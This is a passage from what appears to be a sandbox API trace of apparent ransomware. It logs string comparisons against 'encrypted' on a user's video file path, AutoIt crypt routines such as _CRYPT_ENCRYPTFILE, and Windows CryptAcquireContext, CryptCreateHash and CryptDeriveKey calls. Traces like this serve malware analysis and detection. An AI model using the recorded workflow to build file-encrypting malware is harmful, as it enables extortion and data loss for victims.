lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.379] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.379] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.379] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.379] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.379] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.379] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.379] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.379] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.379] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.379] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.379] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.379] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.379] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.379] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.379] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.379] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.379] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.379] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.379] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.379] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.379] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.379] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.379] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.379] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.379] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.379] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.379] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.379] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.379] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.379] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Aw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Of4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.380] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.380] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0043.380] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0043.380] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0043.381] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.381] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.381] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.381] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.381] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.381] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd7aab80, ftCreationTime.dwHighDateTime=0x1d5bbb4, ftLastAccessTime.dwLowDateTime=0xb609cf10, ftLastAccessTime.dwHighDateTime=0x1d5ba6f, ftLastWriteTime.dwLowDateTime=0xb609cf10, ftLastWriteTime.dwHighDateTime=0x1d5ba6f, nFileSizeHigh=0x0, nFileSizeLow=0xe9d3, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="9QOf4ezMoY.mkv", cAlternateFileName="9QOF4E~1.MKV")) returned 0x7c2240 [0043.381] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0043.381] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.381] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0043.381] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.381] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.381] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0043.381] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.381] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0043.381] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.381] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.381] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0043.382] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.382] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.382] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.382] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.382] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.382] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0043.382] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.382] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0043.383] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.383] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.383] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0043.383] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.383] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.383] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.383] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.383] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.383] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0043.383] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.383] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.383] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.383] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.383] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.383] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.383] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0043.383] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.384] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.384] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0043.384] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.384] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.384] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0043.384] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.384] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.384] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0043.384] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.384] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.384] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.384] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.384] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.384] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.384] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.384] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0043.384] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.384] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.384] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0043.384] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.384] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.385] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.385] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.385] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0043.385] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.385] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.385] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.385] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.385] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.385] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0043.385] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.385] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.385] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.385] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.385] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.385] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0043.385] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.385] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.385] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0043.386] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.386] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.386] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.386] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.386] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.386] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: 